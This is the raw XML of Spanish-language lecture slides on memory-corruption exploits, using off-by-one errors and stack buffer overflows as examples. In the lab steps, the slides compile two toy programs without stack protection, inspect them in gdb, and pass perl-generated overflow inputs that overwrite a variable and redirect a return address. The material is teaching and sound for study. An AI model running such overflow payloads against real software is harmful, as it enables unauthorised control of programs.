            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2400"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400"/>
              <a:t>oner un valor conocido en la dirección de memoria de iValor.!!</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84" name="Google Shape;184;p33"/>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 ./Ej_overflow_1 $(perl -e 'print "A"x30')</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
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>alcular bytes de memoria entre iValor y buffer_dos:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) print 0xbffff7f4 - 0xbffff7e0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
              <a:t>$ ./Ej_overflow_1 $(perl -e 'print "A"x20 . "ABCD"')</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>$ ./Ej_overflow_1 $(perl -e 'print "A"x20 . "\xef\xbe\xad\xde"')</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Es posible..!!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7486650" y="1955575"/>
            <a:ext cx="1514400" cy="801000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd fmla="val -168874" name="adj1"/>
              <a:gd fmla="val 1677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2400">
                <a:latin typeface="Amatic SC"/>
                <a:ea typeface="Amatic SC"/>
                <a:cs typeface="Amatic SC"/>
                <a:sym typeface="Amatic SC"/>
              </a:rPr>
              <a:t>Calculado</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:latin typeface="Amatic SC"/>
              <a:ea typeface="Amatic SC"/>
              <a:cs typeface="Amatic SC"/>
              <a:sym typeface="Amatic S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91" name="Google Shape;191;p34"/>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t>Experimentando con bash y Ej_overflow_2</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2400" u="sng"/>
              <a:t>Objetivo</a:t>
            </a:r>
            <a:endParaRPr sz="2400" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2400"/>
              <a:t>Lograr que la función chek_authentication retorne para enviar parte del mensaje de main.!!</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97" name="Google Shape;197;p35"/>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 gdb -q Ej_overflow_2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) disassemble main</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Identificar las direcciones de llamadas a printf. Pueden ser valores como 0x08048585; 0x08048595; 0x080485a5. Luego:</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
              <a:t>$ ./Ej_overflow_2 $(perl -e 'print "\x7d\x85\x04\x08"x10')</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rPr lang="es"/>
              <a:t>Probar imprimir variantes del mensaje...</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203" name="Google Shape;203;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900" y="1228675"/>
            <a:ext cx="9144000" cy="39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Utilizando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> una técnica similar para desbordar un búfer en la dirección de retorno; se podría intentar también inyectar instrucciones propias en la memoria y luego devolver la ejecución a esas direcciones. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Estas instrucciones inyectadas se denominan shellcode y podrían decirle al programa que restaure privilegios y abra un indicador de shell para hacer… ¿?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Pero eso da para otra clase..!!</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dónde continuar ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;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Jon Erickson; “Hacking, the art of exploitation” 2nd Edition; No Starch Press; San Francisco; 2008.-</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Guía de Exploits, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Guía de auto-estudio para la escritura de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>exploits”; Basado en los</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> abos de Gera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>; Teresa Alberto; Seguridad en TIC, Fundación Sadosky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>BY-NC-SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>; 2018.-</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Seguridad en TIC, CTF; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>El futuro ya llegó; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a: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Solo tres deseos</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="11524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hombre liberó al genio de la lámpara a cambio de tres deseos…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Quiero un millón de u$s.!!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Quiero una ferrari.!!</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s"/>
              <a:t>Quiero ser irresistible para las mujeres...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Google Shape;70;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6249975" y="1633170"/>
            <a:ext cx="2845225" cy="1314475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Google Shape;71;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4063050" y="2593875"/>
            <a:ext cx="2744076" cy="1420625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Google Shape;72;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-5157" l="0" r="-2134" t="3023"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7863600" y="3557975"/>
            <a:ext cx="1231600" cy="150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todos programamos ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1228675"/>
            <a:ext cx="6460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Del mismo modo que el deseo final del hombre se concedió en función de lo que dijo, en lugar de lo que estaba pensando, un programa seguirá exactamente las instrucciones que codificó el programador y los resultados no siempre serán los que el programador pretendía. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Y a veces las repercusiones pueden ser catastróficas..!!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Google Shape;79;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6543675" y="1177677"/>
            <a:ext cx="2600325" cy="312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off-by-one error</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Quiero construir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> una cerca de 100 metros, con postes espaciados a 10 metros de distancia.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>¿ Cuántos postes compro ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Debo procesar todos los “ítems” entre 5 y 17. Implemento un ciclo de ¿ 17 - 5 pasos ó 17 - 5 + 1 pasos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OpenSSH Off-By-One Vulnerability</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Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>A security bug in OpenSSH that can be exploited locally by an authenticated user logging into a vulnerable OpenSSH server or by a malicious SSH server attacking a vulnerable OpenSSH client allows them to create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng"/>
              <a:t>buffer overflow attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>https://securiteam.com/unixfocus/5pp01206ke/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Generalized Exploit Techniques</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mayoría de los “exploits” tienen que ver con corrupción de la memoria. Incluyen técnicas de explotación comunes como “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>”, así como métodos menos comunes como “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>format string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>”.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>El objetivo final de estas técnicas es tomar el control del flujo de ejecución del programa objetivo engañándolo para que ejecute un fragmento de código malicioso que se ha introducido de contrabando en memoria.</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03" name="Google Shape;103;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900" y="1228675"/>
            <a:ext cx="9144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Ej_overflow_1.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>gcc -g -o Ej_overflow_1 Ej_overflow_1.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>dependiendo del SO vamos a tener que compilar así:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>gcc -g -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Ej_overflow_1 Ej_overflow_1.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>-fno-stack-protector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0x310 buffer overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900" y="1228675"/>
            <a:ext cx="9144000" cy="34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Ej_overflow_2.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>gcc -g -o Ej_overflow_2 Ej_overflow_2.c -fno-stack-protector</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>gdb -q ./Ej_overflow_2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>Objetivo:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Poner break en las instrucciones</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>strcpy(password_buffer, buffer);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>return auth_flag;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